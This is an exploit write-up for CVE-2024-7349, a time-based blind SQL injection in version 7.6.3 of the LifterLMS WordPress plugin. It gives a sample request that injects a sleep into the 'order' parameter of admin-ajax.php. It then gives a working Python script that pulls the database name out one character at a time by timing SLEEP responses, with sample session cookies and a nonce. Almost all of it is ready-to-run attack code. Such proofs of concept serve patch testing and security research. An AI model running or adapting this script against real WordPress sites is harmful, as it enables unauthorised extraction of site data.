# Exploit Title: LifterLMS - Blind SQL Injection # Date: 09/2024 # Exploit Author: FURKAN KARAARSLAN # Category: Webapps # CVE : CVE-2024-7349 # Version: 7.6.3 # Vendor: https://lifterlms.com/ # Remotely Exploitable: Yes # Authentication Required: Yes # CVSSv3.1 Score: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H # Details: https://www.byresearchers.net/2024/09/cve-2024-7349-lifterlms-775.html ############################################################################ # Request: # POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 # Host: 127.0.0.1 # Content-Length: 168 # Accept: application/json, text/javascript, */*; q=0.01 # Content-Type: application/x-www-form-urlencoded; charset=UTF-8 # X-Requested-With: XMLHttpRequest # sec-ch-ua-mobile: ?0 # User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 # Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 # Cookie: wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5Zeq; # Connection: close # #action=export_admin_table&handler=Students&page=1&order=ASC,sleep(5)&orderby=name&filter=&filterby=course_membership&search=&#per_page=25&_ajax_nonce=98cedbc865&post_id= ############################################################################ #Exploit Code import requests import time url = "http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" headers = { "Host": "127.0.0.1", "Content-Length": "168", "sec-ch-ua": '"Not-A.Brand";v="99", "Chromium";v="124"', "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36", "sec-ch-ua-platform": '"Windows"', "Origin": "http://127.0.0.1", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://127.0.0.1/wordpress/wp-admin/admin.php?page=llms-reporting", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Cookie": "wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7Ced0ece46aaebda96ea02600b26a591f260ecdb2ec7eec146285e45b994b19c0e; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7C24f5e9d7acbb1e7915b89f9375a0298dfabcd5d08f0f226d3831b46abdb27f11; wp_llms_session_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C%7C1718239319%7C%7C1718235719%7C%7C8ce81de66404741005a03ee3e5b747e1; wp-settings-time-1=1718217826", "Connection": "close" } def find_db_name(): db_name = "" for i in range(1, 21): for c in range(32, 127): payload = f"action=export_admin_table&handler=Students&page=1&order=ASC,(SELECT IF(ASCII(SUBSTRING(DATABASE(),{i},1))={c},SLEEP(2),0))&orderby=name&filter=&filterby=course_membership&search=&per_page=25&_ajax_nonce=98cedbc865&post_id=" start_time = time.time() response = requests.post(url, headers=headers, data=payload) end_time = time.time() if end_time - start_time > 2: db_name += chr(c) print(f"Found character: {chr(c)} at position {i}") break return db_name database_name = find_db_name() print(f"Database name: {database_name}")